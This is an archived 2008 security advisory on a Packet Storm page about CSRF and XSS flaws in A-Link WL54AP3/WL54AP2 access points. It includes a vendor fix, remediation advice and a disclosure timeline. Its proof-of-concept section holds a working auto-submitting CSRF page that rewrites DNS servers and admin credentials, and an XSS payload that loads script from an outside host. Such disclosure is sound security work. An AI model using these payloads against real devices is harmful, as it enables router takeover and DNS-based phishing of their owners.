exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

alink-xsrfxss.xt

alink-xsrfxss.xt
Posted Oct 31, 2008
Authored by Jussi Vuokko, Henri Lindberg | Site louhi.fi

A-Link WL54AP3 and WL54AP2 suffers from cross site scripting and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | e521d8c668e30f86dd30fc18bb9c399f4bfd9ab97f2c13fc62dd214614f50f0d

alink-xsrfxss.xt

Change Mirror Download
           Louhi Networks Information Security Research
Security Advisory


Advisory: A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability
Release Date: 2008/10/31
Last Modified: 2008/10/28
Authors: Jussi Vuokko, CISSP [jussi.vuokko@louhi.fi]
Henri Lindberg [henri.lindberg@louhi.fi]

Device: A-Link WL54AP3 and WL54AP2 (any firmware)
Severity: CSRF and XSS in management interface
Risk: Moderate
Vendor Status: Vendor has released an updated version
References: https://www.louhinetworks.fi/advisory/alink_081028.txt


Overview:

Quote from https://www.a-link.com/
"WLAN Access point 54MB, 4-port
Wlan Access point, wireless 54Mbps, DSSS, 802.11g-standard based and
it's compatible also with other manufacturers cards."

During an audit of A-Link WLAN54AP3 it was discovered that a cross
site request forgery vulnerability exists in the management
interface. It is possible for an attacker to perform any
administrative actions in the management interface, if victim
can be lured or forced to view malicious content. These administrative
actions include e.g. changing admin user's username and password,
DNS settings etc.

In addition, it was discovered that no input validation or output
encoding is performed in management interface, thus making it
vulnerable to cross-site scripting.

By default admin password is blank and no authentication is performed
for requests to administrative interface. As ordinary consumers usually
use out-of-the-box settings, this vulnerability offers same kind of
phishing possibilities as used in Banamex attacks[1].

A-Link WLAN54AP2 (EOL) is vulnerable to this threat as well.

[1] https://www.google.fi/search?q=banamex+phishing+dns+poison


Details:

A-Link WLAN54AP3 does not validate the origin of an HTTP request. If
attacker is able to make user view malicious content, the WLAN54AP3
device can be controlled by submitting suitable forms. Attacker is
effectively acting as an administrator.

Successful attack requires that the attacker knows the management
interface address for the target device (default IP address is
192.168.1.254). As the management interface does not have logout
functionality, user can be vulnerable to this attack even after
closing a tab containing the management interface (if user does not
close the browser window or clear cookies and depending on browser
behaviour) or if default blank password is used.


Proof of Concept:

CSRF:

Example form (changes DNS servers, enables WAN web server access
and changes user's username and password):

<html>
<body onload="document.wan.submit(); document.password.submit()">
<form action="https://192.168.1.254/goform/formWanTcpipSetup"
method="post" name="wan">
<input type="hidden" value="dnsManual" name="dnsMode" checked>
<input type="hidden" name="dns1" value="216.239.32.10">
<input type="hidden" name="dns2" value="216.239.32.10">
<input type="hidden" name="dns3" value="216.239.32.10">
<input type="hidden" name="webWanAccess" value="ON"
checked="checked">
</form>
<form action="https://192.168.1.254/goform/formPasswordSetup"
method="post" name="password">
<input type="hidden" name="username" value="mallory">
<input type="hidden" name="newpass" value="gotroot">
<input type="hidden" name="confpass" value="gotroot">
</form>
</body>
</html>

XSS:

Add following content to management interface's Management - DDNS -
Domain Name:

""><script src="https://l7.fi"></script><p


Workaround:

-


Solution:

Include a random user-specific token in forms. More information:
https://en.wikipedia.org/wiki/Cross-site_request_forgery

Perform an input validation and/or an output encoding. More information:
https://en.wikipedia.org/wiki/Cross_site_scripting

Use secure out-of-the-box configuration (for example generate
default passwords based on device serial or MAC address using
a secure cryptographic algorithm).


Disclosure Timeline:

13. September 2008 - Contacted A-Link by email
28. October 2008 - Vendor released an updated version
31. October 2008 - Advisory was released

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close